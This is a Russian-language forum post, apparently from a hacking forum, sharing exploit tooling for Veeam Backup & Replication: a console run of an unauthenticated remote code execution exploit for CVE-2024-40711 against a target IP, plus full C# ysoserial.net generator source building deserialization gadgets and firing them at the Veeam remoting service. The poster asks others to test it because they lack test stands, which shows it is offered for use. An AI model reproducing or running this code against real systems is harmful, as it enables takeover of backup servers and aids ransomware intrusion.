- Регистрация
- 27 Фев 2025
- Сообщения
- 18
- Реакции
- 6
Код:
PS C:\Users\mz\Desktop\CVE-2024-40711-main\CVE-2024-40711-poc> C:\Users\mz\Desktop\CVE-2024-40711-main\CVE-2024-40711-po
c\ysoserial\bin\Debug\ysoserial.exe -f binaryformatter -g Veeam -c http://192.168.201.1:8000/trigger --targetveeam 192.1
68.201.158
__ .__ ___________
__ _ _______ _/ |_ ____ | |_\__ ___/_____ _ _________
\ \/ \/ /\__ \\ __\/ ___\| | \| | / _ \ \/ \/ /\_ __ \
\ / / __ \| | \ \___| Y \ |( <_> ) / | | \/
\/\_/ (____ /__| \___ >___| /____| \____/ \/\_/ |__|
\/ \/ \/
(*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
- Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
- Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
- Thank you to my dear friend Soroush Dalili (@irsdl) for his help
CVEs: [CVE-2024-40711]Первый линк к изучению:
Вы должны быть зарегистрированы для просмотра ссылок
Оригинальный исходник с гитхаб:
Вы должны быть зарегистрированы для просмотра ссылок
Собраный сурс со всеми зависимостями и dll:
Вы должны быть зарегистрированы для просмотра ссылок
(вариант запуска выше);Второй линк : CVE-2025-23120 -
Вы должны быть зарегистрированы для просмотра ссылок
Код:
using Newtonsoft.Json.Linq;
using Polenter.Serialization.Core;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Runtime.Serialization;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
using Veeam.Backup.Core;
using Veeam.Backup.Model;
using ysoserial.Helpers;
namespace ysoserial.Generators
{
public class VeeamGenerator : GenericGenerator
{
public override string Finders()
{
return "friday the 13th";
}
public override object Generate(string formatter, InputArgs inputArgs)
{
string banner = @"
__ .__ ___________
__ _ _______ _/ |_ ____ | |_\__ ___/_____ _ _________
\ \/ \/ /\__ \\ __\/ ___\| | \| | / _ \ \/ \/ /\_ __ \
\ / / __ \| | \ \___| Y \ |( <_> ) / | | \/
\/\_/ (____ /__| \___ >___| /____| \____/ \/\_/ |__|
\/ \/ \/
";
string banner2 = @"
(*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
- Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
- Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
- Thank you to my dear friend Soroush Dalili (@irsdl) for his help
CVEs: [CVE-2024-40711]
";
Console.WriteLine(banner);
Console.WriteLine(banner2);
string tool_path_ExploitRemoting = @".\ExploitRemotingService\ExploitRemotingService.exe";
string tool_path_RogueRemoting = @".\RogueRemotingServer\RogueRemotingServer.exe";
string rogueremoting_payload_filename = @"exploit.soapformatter";
if (!File.Exists(tool_path_ExploitRemoting))
{
Console.WriteLine($"[!] Following tool needs to be present {tool_path_ExploitRemoting}");
System.Environment.Exit(1);
}
if (!File.Exists(tool_path_RogueRemoting))
{
Console.WriteLine($"[!] Following tool needs to be present {tool_path_RogueRemoting}");
System.Environment.Exit(1);
}
if (!File.Exists(rogueremoting_payload_filename))
{
Console.WriteLine($"[!] required payload is not present");
System.Environment.Exit(1);
}
//ObjRefGenerator gen = new ObjRefGenerator();
DataSetTypeSpoofGenerator gen = new DataSetTypeSpoofGenerator();
CDbCryptoKeyInfoWrapper payload = new CDbCryptoKeyInfoWrapper(new string[] { Convert.ToBase64String((byte[])gen.Generate(formatter, inputArgs) ) });
ProcessStartInfo rogueRemoting = new ProcessStartInfo
{
FileName = tool_path_RogueRemoting,
Arguments = @"--wrapSoapPayload " + inputArgs.Cmd + " " + rogueremoting_payload_filename,
UseShellExecute = false,
CreateNoWindow = false
};
Process.Start(rogueRemoting);
ProcessStartInfo exploitRemoting = new ProcessStartInfo
{
FileName = tool_path_ExploitRemoting,
// I know
Arguments = @"-s tcp://" + inputArgs.TargetVeeamIP + @":6170/PermanentSessionService raw " + Convert.ToBase64String((byte[])Serialize(payload, formatter, inputArgs)),
UseShellExecute = false,
RedirectStandardOutput = true,
RedirectStandardError = true,
CreateNoWindow = true
};
Process.Start(exploitRemoting);
System.Environment.Exit(1);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("soapformatter", StringComparison.OrdinalIgnoreCase))
{
return Serialize(payload, formatter, inputArgs);
}
else
{
throw new Exception("Formatter not supported");
}
}
public override string Name()
{
return "Veeam";
}
public override List<string> SupportedFormatters()
{
return new List<string> { "BinaryFormatter", "SoapFormatter", "ObjectStateFormatter", "LosFormatter" };
}
[Serializable]
public class CDbCryptoKeyInfoWrapper : ISerializable
{
private string[] _fakeList;
public CDbCryptoKeyInfoWrapper(string[] _fakeList)
{
this._fakeList = _fakeList;
}
public void GetObjectData(SerializationInfo info, StreamingContext context)
{
info.SetType(typeof(CDbCryptoKeyInfo));
info.AddValue("Id", Guid.NewGuid());
info.AddValue("KeySetId", null);
info.AddValue("KeyType", 1);
info.AddValue("Hint", "aaaaa");
info.AddValue("DecryptedKeyValue", "AAAA");
info.AddValue("LocaleLCID", 0x409);
info.AddValue("ModificationDateUtc", new DateTime());
info.AddValue("CryptoAlg", 1);
info.AddValue("RepairRecs", _fakeList);
}
}
}
}
Код:
using System;
using System.Collections.Generic;
using System.Data;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;
using ysoserial.Helpers;
namespace ysoserial.Generators
{
public class DataSetTypeSpoofGenerator : DataSetGenerator
{
public override string Name()
{
return "DataSetTypeSpoof";
}
public override string Contributors()
{
return "Soroush Dalili, Markus Wulftange, Jang";
}
public override string AdditionalInfo()
{
return "A more advanced type spoofing which can use any arbitrary types can be seen in TestingArenaHome::SpoofByBinaryFormatterJson or in the DataSetOldBehaviour gadget";
}
public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}
public override object Generate(string formatter, InputArgs inputArgs)
{
byte[] binaryFormatterPayload;
if (BridgedPayload != null)
{
binaryFormatterPayload = (byte[])BridgedPayload;
}
else
{
binaryFormatterPayload = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
}
DataSetSpoofMarshal payloadDataSetMarshal = new DataSetSpoofMarshal(binaryFormatterPayload);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("soapformatter", StringComparison.OrdinalIgnoreCase))
{
return Serialize(payloadDataSetMarshal, formatter, inputArgs);
}
else
{
throw new Exception("Formatter not supported");
}
}
}
// https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf
[Serializable]
public class DataSetSpoofMarshal : ISerializable
{
byte[] _fakeTable;
public void GetObjectData(SerializationInfo info, StreamingContext context)
{
// info.SetType(typeof(System.Data.DataSet));
//info.AssemblyName = "mscorlib";
//info.FullTypeName = typeof(System.Data.DataSet).AssemblyQualifiedName;
info.AssemblyName = "Veeam.Backup.EsxManager, Version=12.3.0.0, Culture=neutral, PublicKeyToken=bfd684de2276783a";
info.FullTypeName = "Veeam.Backup.EsxManager.xmlFrameworkDs";
info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
info.AddValue("DataSet.DataSetName", "");
info.AddValue("DataSet.Namespace", "");
info.AddValue("DataSet.Prefix", "");
info.AddValue("DataSet.CaseSensitive", false);
info.AddValue("DataSet.LocaleLCID", 0x409);
info.AddValue("DataSet.EnforceConstraints", false);
info.AddValue("DataSet.ExtendedProperties", (System.Data.PropertyCollection) null);
info.AddValue("DataSet.Tables.Count", 1);
info.AddValue("DataSet.Tables_0", _fakeTable);
}
public void SetFakeTable(byte[] bfPayload)
{
_fakeTable = bfPayload;
}
public DataSetSpoofMarshal(byte[] bfPayload)
{
SetFakeTable(bfPayload);
}
public DataSetSpoofMarshal(object fakeTable) : this(fakeTable, new InputArgs())
{
// This won't use anything we might have defined in ysoserial.net BinaryFormatter process (such as minification)
}
public DataSetSpoofMarshal(object fakeTable, InputArgs inputArgs)
{
MemoryStream stm = new MemoryStream();
if (inputArgs.Minify)
{
ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal =
new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
fmtLocal.Serialize(stm, fakeTable);
}
else
{
BinaryFormatter fmt = new BinaryFormatter();
fmt.Serialize(stm, fakeTable);
}
SetFakeTable(stm.ToArray());
}
public DataSetSpoofMarshal(MemoryStream ms)
{
SetFakeTable(ms.ToArray());
}
}
}Код требует доп тестов и обратной связи, у меня к сожелению не нашлось стендов.